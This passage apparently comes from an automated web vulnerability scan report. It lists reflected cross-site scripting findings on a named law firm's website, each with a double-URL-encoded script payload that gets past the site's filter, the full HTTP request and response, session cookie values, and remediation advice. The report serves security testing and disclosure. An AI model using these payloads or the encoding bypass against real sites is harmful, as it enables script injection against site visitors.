The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6dd6d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea322173fb55 was submitted in the REST URL parameter 2. This input was echoed as 6dd6d"><script>alert(1)</script>a322173fb55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/ui.resizable.js6dd6d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea322173fb55 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js/ui.resizable.js6dd6d"><script>alert(1)</script>a322173fb55" value="">
...[SNIP]...

4.195. http://www.wileyrein.com/rss/awards/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/awards/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4823f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e74755294a4f was submitted in the REST URL parameter 1. This input was echoed as 4823f"><script>alert(1)</script>74755294a4f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss4823f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e74755294a4f/awards/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss4823f"><script>alert(1)</script>74755294a4f/awards/rss.xml" value="">
...[SNIP]...

4.196. http://www.wileyrein.com/rss/awards/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/awards/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ddba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb482c6d5ffe was submitted in the REST URL parameter 2. This input was echoed as 3ddba"><script>alert(1)</script>b482c6d5ffe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/awards3ddba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb482c6d5ffe/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/awards3ddba"><script>alert(1)</script>b482c6d5ffe/rss.xml" value="">
...[SNIP]...

4.197. http://www.wileyrein.com/rss/awards/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/awards/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4862c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e626bbbadd84 was submitted in the REST URL parameter 3. This input was echoed as 4862c"><script>alert(1)</script>626bbbadd84 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/awards/rss.xml4862c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e626bbbadd84 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/awards/rss.xml4862c"><script>alert(1)</script>626bbbadd84" value="">
...[SNIP]...

4.198. http://www.wileyrein.com/rss/events/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/events/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96c9a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb17c06f0b56 was submitted in the REST URL parameter 1. This input was echoed as 96c9a"><script>alert(1)</script>b17c06f0b56 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss96c9a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb17c06f0b56/events/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss96c9a"><script>alert(1)</script>b17c06f0b56/events/rss.xml" value="">
...[SNIP]...

4.199. http://www.wileyrein.com/rss/events/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/events/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d1d6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f934a0d192 was submitted in the REST URL parameter 2. This input was echoed as 8d1d6"><script>alert(1)</script>3f934a0d192 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/events8d1d6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f934a0d192/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/events8d1d6"><script>alert(1)</script>3f934a0d192/rss.xml" value="">
...[SNIP]...

4.200. http://www.wileyrein.com/rss/events/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/events/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ac25%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea7c854d93a was submitted in the REST URL parameter 3. This input was echoed as 5ac25"><script>alert(1)</script>a7c854d93a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/events/rss.xml5ac25%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea7c854d93a HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/events/rss.xml5ac25"><script>alert(1)</script>a7c854d93a" value="">
...[SNIP]...

4.201. http://www.wileyrein.com/rss/in_the_news/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/in_the_news/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cefc3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb60ad84eb9c was submitted in the REST URL parameter 1. This input was echoed as cefc3"><script>alert(1)</script>b60ad84eb9c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rsscefc3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb60ad84eb9c/in_the_news/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rsscefc3"><script>alert(1)</script>b60ad84eb9c/in_the_news/rss.xml" value="">
...[SNIP]...

4.202. http://www.wileyrein.com/rss/in_the_news/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/in_the_news/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc00e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed760b3b5dd4 was submitted in the REST URL parameter 2. This input was echoed as cc00e"><script>alert(1)</script>d760b3b5dd4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/in_the_newscc00e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed760b3b5dd4/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/in_the_newscc00e"><script>alert(1)</script>d760b3b5dd4/rss.xml" value="">
...[SNIP]...

4.203. http://www.wileyrein.com/rss/in_the_news/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/in_the_news/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6f54%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2151516518f was submitted in the REST URL parameter 3. This input was echoed as b6f54"><script>alert(1)</script>2151516518f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/in_the_news/rss.xmlb6f54%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2151516518f HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/in_the_news/rss.xmlb6f54"><script>alert(1)</script>2151516518f" value="">
...[SNIP]...

4.204. http://www.wileyrein.com/rss/news_releases/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/news_releases/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9abb7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3d2f01cf3f9 was submitted in the REST URL parameter 1. This input was echoed as 9abb7"><script>alert(1)</script>3d2f01cf3f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss9abb7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3d2f01cf3f9/news_releases/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss9abb7"><script>alert(1)</script>3d2f01cf3f9/news_releases/rss.xml" value="">
...[SNIP]...

4.205. http://www.wileyrein.com/rss/news_releases/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/news_releases/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc1d0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e98c2f7af3b5 was submitted in the REST URL parameter 2. This input was echoed as dc1d0"><script>alert(1)</script>98c2f7af3b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/news_releasesdc1d0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e98c2f7af3b5/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/news_releasesdc1d0"><script>alert(1)</script>98c2f7af3b5/rss.xml" value="">
...[SNIP]...

4.206. http://www.wileyrein.com/rss/news_releases/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/news_releases/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee81a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed27cf73a803 was submitted in the REST URL parameter 3. This input was echoed as ee81a"><script>alert(1)</script>d27cf73a803 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/news_releases/rss.xmlee81a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed27cf73a803 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/news_releases/rss.xmlee81a"><script>alert(1)</script>d27cf73a803" value="">
...[SNIP]...

4.207. http://www.wileyrein.com/rss/practices/Advertising/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Advertising/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32ca8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e73f8dfaacf9 was submitted in the REST URL parameter 1. This input was echoed as 32ca8"><script>alert(1)</script>73f8dfaacf9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss32ca8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e73f8dfaacf9/practices/Advertising/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss32ca8"><script>alert(1)</script>73f8dfaacf9/practices/Advertising/rss.xml" value="">
...[SNIP]...

4.208. http://www.wileyrein.com/rss/practices/Advertising/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Advertising/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5de32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebc55ccc6862 was submitted in the REST URL parameter 2. This input was echoed as 5de32"><script>alert(1)</script>bc55ccc6862 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices5de32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebc55ccc6862/Advertising/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
